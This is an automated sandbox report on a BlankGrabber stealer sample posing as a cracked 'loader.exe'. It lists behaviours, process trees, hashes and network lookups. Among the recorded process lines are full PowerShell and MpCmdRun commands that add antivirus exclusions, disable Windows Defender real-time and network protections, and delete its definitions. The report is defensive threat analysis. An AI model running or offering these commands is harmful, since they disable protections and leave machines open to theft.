Malware Analysis Report

2024-10-10 08:30

Sample ID 240619-3fe2yawgrd
Target loader.exe
SHA256 a5449049022450ee54e4ef25e216f81adfc6e65f8b88b92f097145c29e092424
Tags blankgrabber evasion execution themida trojan upx
Score 10/10

Analysis Overview

Score 10/10

SHA256 a5449049022450ee54e4ef25e216f81adfc6e65f8b88b92f097145c29e092424

Threat Level: Known bad

The file loader.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber evasion execution themida trojan upx

Blankgrabber family

Deletes Windows Defender Definitions

A stealer written in Python and packaged with Pyinstaller

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Checks BIOS information in registry

Executes dropped EXE

Loads dropped DLL

Themida packer

UPX packed file

Checks whether UAC is enabled

Enumerates physical storage devices

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-19 23:27

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 23:27

Reported

2024-06-19 23:58

Platform

win10-20240404-en

Max time kernel

516s

Max time network

1608s

Command Line

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3164 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Users\Admin\AppData\Local\Temp\loader.exe
PID 592 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 3472 wrote to memory of 3188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 592 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 200 wrote to memory of 1352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4728 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2776 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4420 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 2640 wrote to memory of 4996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 5112 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe
PID 200 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe

Processes

C:\Users\Admin\AppData\Local\Temp\loader.exe

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

C:\Users\Admin\AppData\Local\Temp\loader.exe

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()"

C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe

bound.exe

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Network

Country Destination Domain Proto
US 8.8.8.8:53 blank-jyhmj.in udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 52.142.223.178:80 N/A tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI31642\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

\Users\Admin\AppData\Local\Temp\_MEI31642\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/592-30-0x00007FFF9D630000-0x00007FFF9DC19000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31642\base_library.zip

MD5 32ede00817b1d74ce945dcd1e8505ad0
SHA1 51b5390db339feeed89bffca925896aff49c63fb
SHA256 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512 a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_ctypes.pyd

MD5 00f75daaa7f8a897f2a330e00fad78ac
SHA1 44aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA256 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512 f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

memory/592-35-0x00007FFFA15A0000-0x00007FFFA15C3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31642\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI31642\bound.blank

MD5 7705111a97e722d4bb4a0b91d8a6b55f
SHA1 474b52afdd55503fb2f3c2ca7c53824e8785ede8
SHA256 6c2330df293aaff501678a9783b4b8886368cb6011465b4256bfbed4c82ea224
SHA512 c096914345acc01859d0fb03d9c2f2f215d189ec6854987e349d434f80eeccfbd71fddaeef093deda560b48c1b0fedabdd560e1e1c80c4761a9557dddba343a4

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

memory/592-54-0x00007FFFA2620000-0x00007FFFA262F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_decimal.pyd

MD5 e3fb8bf23d857b1eb860923ccc47baa5
SHA1 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0
SHA256 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3
SHA512 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

C:\Users\Admin\AppData\Local\Temp\_MEI31642\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

C:\Users\Admin\AppData\Local\Temp\_MEI31642\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

C:\Users\Admin\AppData\Local\Temp\_MEI31642\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

C:\Users\Admin\AppData\Local\Temp\_MEI31642\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI31642\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI31642\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

C:\Users\Admin\AppData\Local\Temp\_MEI31642\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512 b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

C:\Users\Admin\AppData\Local\Temp\_MEI31642\blank.aes

MD5 7a959f835f18413a62817c2a945276ce
SHA1 3d77b773782ee5305486efed0286efe23f812443
SHA256 ac865b84b1fe0b4e117d77122501caa540b65ae6b3d7f1eed6fc3424cdf8709c
SHA512 4cb20a09c5f4dfb793e3dd30567d193b1744c74d3a93f54fddb2dab780ce4c466b140fa1234c738fddb7252603e60db3047424a1aab516f341057eebb8c799eb

memory/592-60-0x00007FFFA1570000-0x00007FFFA159D000-memory.dmp

memory/592-62-0x00007FFFA1890000-0x00007FFFA18A9000-memory.dmp

memory/592-64-0x00007FFFA1540000-0x00007FFFA1563000-memory.dmp

memory/592-66-0x00007FFF9B720000-0x00007FFF9B897000-memory.dmp

memory/592-68-0x00007FFFA1520000-0x00007FFFA1539000-memory.dmp

memory/592-70-0x00007FFFA2610000-0x00007FFFA261D000-memory.dmp

memory/592-72-0x00007FFF9E970000-0x00007FFF9E9A3000-memory.dmp

memory/592-76-0x00007FFF9E550000-0x00007FFF9E61D000-memory.dmp

memory/592-75-0x00007FFF9D630000-0x00007FFF9DC19000-memory.dmp

memory/592-77-0x00007FFF97D50000-0x00007FFF98270000-memory.dmp

memory/592-80-0x00007FFFA1500000-0x00007FFFA1514000-memory.dmp

memory/592-79-0x00007FFFA15A0000-0x00007FFFA15C3000-memory.dmp

memory/592-82-0x00007FFFA19D0000-0x00007FFFA19DD000-memory.dmp

memory/592-86-0x00007FFF97B50000-0x00007FFF97C6C000-memory.dmp

memory/592-85-0x00007FFFA1570000-0x00007FFFA159D000-memory.dmp

memory/1352-95-0x000001EC5BA20000-0x000001EC5BA42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bound.exe

MD5 84aede3aa04bb514b90dcb124d948e1f
SHA1 8a0c6a152050a2f6cc0601b2a5c59f5f6c908c17
SHA256 3aeebdc59e7210fd533b8b3dfc8a8c45ca7c9c0f9507aa15924b025f2c3ef1da
SHA512 38c88dbbad0abb249d5ee362a2393bdc63f78a09497e2a012f473ceef59b45de00dddac74dc001cc04a03352baec13aeaffbc587e96bc05de24fa7647e84088a

memory/5112-102-0x00007FF7A90A0000-0x00007FF7A9EA9000-memory.dmp

memory/1276-110-0x00000252DFCB0000-0x00000252DFD26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ka150qib.lom.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5112-186-0x00007FF7A90A0000-0x00007FF7A9EA9000-memory.dmp

memory/5112-188-0x00007FF7A90A0000-0x00007FF7A9EA9000-memory.dmp

memory/5112-189-0x00007FF7A90A0000-0x00007FF7A9EA9000-memory.dmp

memory/5112-190-0x00007FF7A90A0000-0x00007FF7A9EA9000-memory.dmp

memory/5112-191-0x00007FF7A90A0000-0x00007FF7A9EA9000-memory.dmp

memory/5112-187-0x00007FF7A90A0000-0x00007FF7A9EA9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe

MD5 5a796657b6f3717a1d30cd47d29f776a
SHA1 2d87d2b839845709d122d9464b77bb5c25d410f9
SHA256 c5236198f5fc86b31951528ee1f3f881746f8a03afe9c00628b27707871d9159
SHA512 29efda3f2c7e8e0aa406959e9b71b826c51e0dca66282320109cadb87f04ec2744a6e08cec8f87c2f2a5ea334c3a59d7eb697edd667ff0f49974f29a74fc908d

memory/592-303-0x00007FFF97D50000-0x00007FFF98270000-memory.dmp

memory/592-317-0x00007FFF9E550000-0x00007FFF9E61D000-memory.dmp

\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-8.dll

MD5 32d36d2b0719db2b739af803c5e1c2f5
SHA1 023c4f1159a2a05420f68daf939b9ac2b04ab082
SHA256 128a583e821e52b595eb4b3dda17697d3ca456ee72945f7ecce48ededad0e93c
SHA512 a0a68cfc2f96cb1afd29db185c940e9838b6d097d2591b0a2e66830dd500e8b9538d170125a00ee8c22b8251181b73518b73de94beeedd421d3e888564a111c1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 139763c45e7773dbf74f66cea2f8cc10
SHA1 17180c83b0b13077fa3ba3105325be5681cf3e31
SHA256 f869cee7d5923d69edf7e1dfefda14cdf8fd9392b05dfc6724516eb2b66978a9
SHA512 8fc43d28bdc4e554835fb1d5a70715f83b64011fda993619832be4bd15e1713add97236fcbccd0d8f98213e21725a5b74f0826886b7b7b22a12d71924e044ff3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 268b890dae39e430e8b127909067ed96
SHA1 35939515965c0693ef46e021254c3e73ea8c4a2b
